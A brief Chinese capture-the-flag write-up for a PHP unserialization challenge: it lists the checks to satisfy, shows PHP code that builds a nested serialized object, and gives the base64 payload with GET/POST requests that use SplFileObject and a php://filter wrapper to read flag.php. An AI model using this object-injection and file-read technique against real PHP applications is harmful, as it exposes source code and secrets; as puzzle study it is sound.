要调用IPO()通过new _POST['b'])原生类SplFileObject读取文件
SplFileObject类为文件提供了一个面向对象接口
需要满足下列条件:
$this->headmaster == 'ong'
$this->department->hahaha()
同时绕过 if(this->leader->name != 'ing' or $this->leader->rank !='department')
<?php
class teacher{
public $name = 'ing';
public $rank = 'department';
private $salary;
}
class classroom{
public $name = 'one class';
public $leader;
}
class school{
public $department;
public $headmaster= 'ong';
}
$a = new school();
$a -> department = new classroom();
$a -> department -> leader = new teacher();
echo base64_encode(serialize($a));
//Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9
get: ?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9 POST: a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php
加载中...